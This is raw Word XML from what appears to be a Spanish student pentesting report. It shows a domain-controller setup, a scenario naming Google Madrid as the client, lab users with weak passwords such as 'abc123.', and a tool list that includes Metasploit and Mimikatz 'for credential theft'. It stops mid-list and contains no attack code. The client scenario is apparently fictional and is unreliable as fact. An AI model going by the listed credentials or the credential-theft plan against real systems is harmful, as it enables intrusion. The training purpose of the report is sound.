                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E077398" wp14:editId="3EEA7685">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="108906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4119" name=""/>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7E5C2F35" w14:textId="77777777" w:rsidR="0054336E" w:rsidRDefault="0054336E" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15D19572" w14:textId="3A760DBF" w:rsidR="0054336E" w:rsidRDefault="0054336E" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Este usuario tendrá la contraseña ‘abc123.’ .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EEECD5D" w14:textId="77777777" w:rsidR="00C07009" w:rsidRDefault="00C07009" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7606D762" w14:textId="77777777" w:rsidR="00C07009" w:rsidRDefault="00C07009" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2EFDED3A" w14:textId="77777777" w:rsidR="00C07009" w:rsidRDefault="00C07009" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50D1E19D" w14:textId="77777777" w:rsidR="00C07009" w:rsidRDefault="00C07009" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="271B4E90" w14:textId="77777777" w:rsidR="00C07009" w:rsidRDefault="00C07009" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7896F246" w14:textId="77777777" w:rsidR="00C02B7D" w:rsidRDefault="00C02B7D" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B48269A" w14:textId="77777777" w:rsidR="00C02B7D" w:rsidRDefault="00C02B7D" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="402E5ABA" w14:textId="77777777" w:rsidR="00B51105" w:rsidRDefault="00B51105" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17B0B97B" w14:textId="77777777" w:rsidR="00C02B7D" w:rsidRDefault="00C02B7D" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F093F35" w14:textId="32C70A9C" w:rsidR="00C07009" w:rsidRDefault="00CB207A" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:rPr>
                <w:rStyle w:val="Ttulo2Car"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="9" w:name="_Toc135575966"/>
            <w:r w:rsidRPr="00CB207A">
              <w:rPr>
                <w:rStyle w:val="Ttulo2Car"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Configuración Windows Sever DC02:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="9"/>
          </w:p>
          <w:p w14:paraId="1BEDD488" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00CB207A"/>
          <w:p w14:paraId="27EA40F4" w14:textId="77777777" w:rsidR="00B51105" w:rsidRDefault="00B51105" w:rsidP="00B51105">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Lo primero que haré será configurar la red:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC68F26" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00CB207A"/>
          <w:p w14:paraId="2D82978D" w14:textId="2C73BB36" w:rsidR="00B51105" w:rsidRDefault="00903340" w:rsidP="00CB207A">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE1DAA6" wp14:editId="698DF432">
                  <wp:extent cx="6645910" cy="4973955"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="23864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485" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId59">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4973955"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="45E16C75" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00CB207A"/>
          <w:p w14:paraId="29CBFBEC" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66CACD7C" w14:textId="77777777" w:rsidR="00903340" w:rsidRDefault="00903340" w:rsidP="006A17E1">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Colocando El servidor DNS del controlador principal de dominio.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3A0C3B" w14:textId="77777777" w:rsidR="00903340" w:rsidRDefault="00903340" w:rsidP="006A17E1">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06F3E26B" w14:textId="77777777" w:rsidR="00903340" w:rsidRDefault="00903340" w:rsidP="006A17E1">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>La parte de añadir al dominio y configurar el servidor de certificados también la omitiré porque es igual que en el otro controlador, lo mismo para ser servidor de dominio, pues este también será servidor de dominio principal y servidor de certificados principal también.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5541D213" w14:textId="77777777" w:rsidR="00903340" w:rsidRDefault="00903340" w:rsidP="006A17E1">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Básicamente es una clonación de la otra máquina antes de meterla en el dominio, lo que hago es añadir a esta máquina como controlador de dominio y como servidor de certificados.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C54B2E" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60926ED5" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BCCEE05" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22A091C7" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="394D02BD" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="373FA3E2" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="691F185A" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04761BB5" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C9958BB" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78A26432" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DC92459" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03944666" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04B5A6F8" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A5589F3" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5ABA648A" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DD10290" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45330832" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53831B2D" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="152A3517" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FBF24F7" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48D7D4E4" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="079A423E" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2022DE2F" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50AF5F55" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38E2974B" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7964528B" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="383B9DAB" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15A3BC29" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F998EC8" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="057520FB" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14FD3B6B" w14:textId="2599EBF0" w:rsidR="00E115A4" w:rsidRDefault="00507D29" w:rsidP="00A54FDA">
            <w:pPr>
              <w:pStyle w:val="Ttulo1"/>
            </w:pPr>
            <w:bookmarkStart w:id="10" w:name="_Toc135575967"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00E115A4">
              <w:t>Documentación</w:t>
            </w:r>
            <w:bookmarkEnd w:id="10"/>
          </w:p>
          <w:p w14:paraId="3B85EBE3" w14:textId="77777777" w:rsidR="004006F4" w:rsidRPr="004006F4" w:rsidRDefault="004006F4" w:rsidP="004006F4"/>
          <w:p w14:paraId="42A5B7AB" w14:textId="2286C0D6" w:rsidR="00E115A4" w:rsidRDefault="00E115A4" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="11" w:name="_Toc135575968"/>
            <w:r>
              <w:t>Introducción</w:t>
            </w:r>
            <w:bookmarkEnd w:id="11"/>
          </w:p>
          <w:p w14:paraId="2FD7E5AF" w14:textId="77777777" w:rsidR="00E115A4" w:rsidRDefault="00E115A4" w:rsidP="00E115A4"/>
          <w:p w14:paraId="2EB21C48" w14:textId="37F45F5F" w:rsidR="00334F50" w:rsidRDefault="00E115A4" w:rsidP="00E115A4">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">La seguridad informática es una rea que ha estado cobrando mayor importancia dentro de las organizaciones que usan las tecnologías de la información y la comunicación para realizar sus actividades (comerciales, financieras, sociales) y la preocupación por este campo va en aumento ya que hay miles de maneras de sabotear una red </w:t>
            </w:r>
            <w:r w:rsidR="00334F50">
              <w:t>informática</w:t>
            </w:r>
            <w:r>
              <w:t>, su</w:t>
            </w:r>
            <w:r w:rsidR="00334F50">
              <w:t>s dispositivos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> de comunicación, aplicaciones, bases de datos etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3181F707" w14:textId="57C8563B" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00E115A4">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Los propósitos pueden ser muy variados: robo de información, sabotaje, espionaje, diversión, para probar nuevas técnicas, o casi por cualquier motivo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F9D9C1" w14:textId="1E5C8462" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00E115A4">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Para proteger los sistemas hay que ver en que parte son vulnerables, es decir probar técnicas que usan los atacantes para ver si un sistema es seguro, es decir hacer un pentesting, que es una herramienta de diagnóstico que revela la manera de operar de un intruso o atacante para lograr el acceso no autorizado a los sistemas de la información, en otras palabras se simula un ataque tal como lo haría un cibercriminal.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="624A6AC2" w14:textId="1568BB41" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00E115A4">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>En este proyecto explotaré la capacidad de los sistemas de Active Directory y sus equipos para la empresa Google.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2098B053" w14:textId="77777777" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00E115A4">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C7BDA5E" w14:textId="77777777" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00334F50"/>
          <w:p w14:paraId="6A60AEE0" w14:textId="04E1DF02" w:rsidR="00E115A4" w:rsidRPr="00E115A4" w:rsidRDefault="00E115A4" w:rsidP="00334F50"/>
          <w:p w14:paraId="60115D23" w14:textId="63FB1DCF" w:rsidR="00E115A4" w:rsidRDefault="00E115A4" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="12" w:name="_Toc135575969"/>
            <w:r>
              <w:t>Descripción de la empresa</w:t>
            </w:r>
            <w:bookmarkEnd w:id="12"/>
          </w:p>
          <w:p w14:paraId="313D98D3" w14:textId="77777777" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00334F50"/>
          <w:p w14:paraId="355C0A69" w14:textId="1BB73E6E" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="004006F4">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>La empresa para la que voy realizar el pentesting es Google, concretamente su sede en Madrid, en su departamento de Administración.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="018F2DC4" w14:textId="5C4C7A1A" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00334F50">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Esta parte de la empresa tiene 56 empleados, fuimos contactados por la gerente de ciberseguridad de la empresa en Madrid, Eva Lorenzo Casado.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631A7E55" w14:textId="2ECEB74A" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00334F50">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">En cuanto a los </w:t>
            </w:r>
            <w:r w:rsidR="00E25D51">
              <w:t>sistemas</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> sobre los que voy a realizar la prueba de pentesting, son 3.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EADB03A" w14:textId="485F0EFC" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00334F50">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Lo que haré será probar la seguridad de sus dos máquinas de Active Directory, y una máquina cliente.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56EA2D6C" w14:textId="050134B4" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00334F50">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>En este caso se elegio hacer la prueba así porque todos los equipos cliente son los mismos, es decir tienen las mismas aplicaciones instaladas y son clones uno de otro, por lo tanto con realizar las pruebas en uno sabríamos, las vulnerabilidades de los demás porque son iguales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78AC2F5F" w14:textId="77777777" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="006A17E1"/>
          <w:p w14:paraId="6B0491D1" w14:textId="0007BB22" w:rsidR="00334F50" w:rsidRDefault="00334F50" w:rsidP="00334F50">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Estos equipos tienen estas contraseñas y usuarios:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56059BC1" w14:textId="7E281CD6" w:rsidR="00334F50" w:rsidRDefault="00C6479D" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Equipos Windows Server 2019: Usuario Administrador del dominio ‘Administrador’ con contraseña ‘abc123.’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D90FC5D" w14:textId="5DE99BB8" w:rsidR="002444CD" w:rsidRDefault="002444CD" w:rsidP="002444CD">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
            <w:r>
              <w:t>Y un usuario sin privilegios ‘Alesander’ y con contraseña abc123. .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3979056A" w14:textId="1DBF501C" w:rsidR="00334F50" w:rsidRDefault="00C6479D" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Equipo Windows10 20H2: Usuarios ‘Alesander’ siendo administrador y un usuario normal ‘usuario’, con contraseñas ‘abc123.’ Y ‘</w:t>
            </w:r>
            <w:r w:rsidR="00DA5C0B">
              <w:t>123456789</w:t>
            </w:r>
            <w:r>
              <w:t>’ respectivamente.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D2ABE0" w14:textId="77777777" w:rsidR="00DA5C0B" w:rsidRDefault="00DA5C0B" w:rsidP="00DA5C0B"/>
          <w:p w14:paraId="36BD467B" w14:textId="77777777" w:rsidR="00DA5C0B" w:rsidRDefault="00DA5C0B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="13" w:name="_Toc135575970"/>
            <w:r>
              <w:t>Planteamiento del problema</w:t>
            </w:r>
            <w:bookmarkEnd w:id="13"/>
          </w:p>
          <w:p w14:paraId="611FFDBF" w14:textId="77777777" w:rsidR="00DA5C0B" w:rsidRDefault="00DA5C0B" w:rsidP="00DA5C0B"/>
          <w:p w14:paraId="447EB72E" w14:textId="5F60B05F" w:rsidR="00DA5C0B" w:rsidRDefault="00DA5C0B" w:rsidP="00DA5C0B">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>La empresa Google y yo llegamos a un acuerdo para realizar una prueba de pentesting a sus equipos del departamento de Administración, con motivo de comprobar la seguridad de este departamento, debido a un reciente ataque sobre el sistema mediante un troyano.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7BB84C" w14:textId="0A122855" w:rsidR="00DA5C0B" w:rsidRDefault="00DA5C0B" w:rsidP="00DA5C0B">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Con lo cual se busca proteger el sistema para evitar fugas de datos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1048A2C4" w14:textId="38D47104" w:rsidR="00DA5C0B" w:rsidRPr="00DA5C0B" w:rsidRDefault="00DA5C0B" w:rsidP="00DA5C0B">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Como esta empresa trabajo con datos privados de los usuarios de su navegador y aplicaciones, tienen que cumplir con la normativa europea GDPR que entró en vigor en mayo de 2018 y en España la ley orgánica 3/2018, de 5 de diciembre, de Protección de datos Personales y garantía de derechos digitales</w:t>
            </w:r>
            <w:r w:rsidR="00537D72">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D296602" w14:textId="77777777" w:rsidR="00DA5C0B" w:rsidRDefault="00DA5C0B" w:rsidP="00DA5C0B"/>
          <w:p w14:paraId="19C8B971" w14:textId="77777777" w:rsidR="00537D72" w:rsidRDefault="00537D72" w:rsidP="00DA5C0B"/>
          <w:p w14:paraId="60839D4C" w14:textId="77777777" w:rsidR="00537D72" w:rsidRDefault="00537D72" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="_Toc135575971"/>
            <w:r>
              <w:t>Objetivo General</w:t>
            </w:r>
            <w:bookmarkEnd w:id="14"/>
          </w:p>
          <w:p w14:paraId="7D7F63B4" w14:textId="77777777" w:rsidR="00537D72" w:rsidRDefault="00537D72" w:rsidP="00537D72"/>
          <w:p w14:paraId="5B24F8AB" w14:textId="50D42D03" w:rsidR="00537D72" w:rsidRDefault="00537D72" w:rsidP="00537D72">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Realizar un pentesting a estos 3 ordenadores en la red local de la empresa Google en Madrid y concretamente del departamento de Administración, utilizando las herramientas descritas a continuación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18C9B9DE" w14:textId="7B9311BC" w:rsidR="00537D72" w:rsidRDefault="00537D72" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Una maquina Parrot OS con una IP 192.168.1.44.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0796762F" w14:textId="3FBFBE1F" w:rsidR="00537D72" w:rsidRDefault="00537D72" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Con metasploit framework 6.0.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="510D3488" w14:textId="692B213E" w:rsidR="00537D72" w:rsidRDefault="00537D72" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Una </w:t>
            </w:r>
            <w:r w:rsidR="00E25D51">
              <w:t>máquina</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Kali Linux con una IP 192.168.1.58.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2FC3A7" w14:textId="58F6522A" w:rsidR="00537D72" w:rsidRDefault="00D21382" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00D21382">
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> para escalada de privilegios y robo de credenciales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4BFCC4" w14:textId="5259048C" w:rsidR="004C67B3" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Z</w:t>
            </w:r>
            <w:r w:rsidRPr="00E65638">
              <w:t>enmap escaneo de red</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50A47846" w14:textId="2A94BB8A" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>N</w:t>
            </w:r>
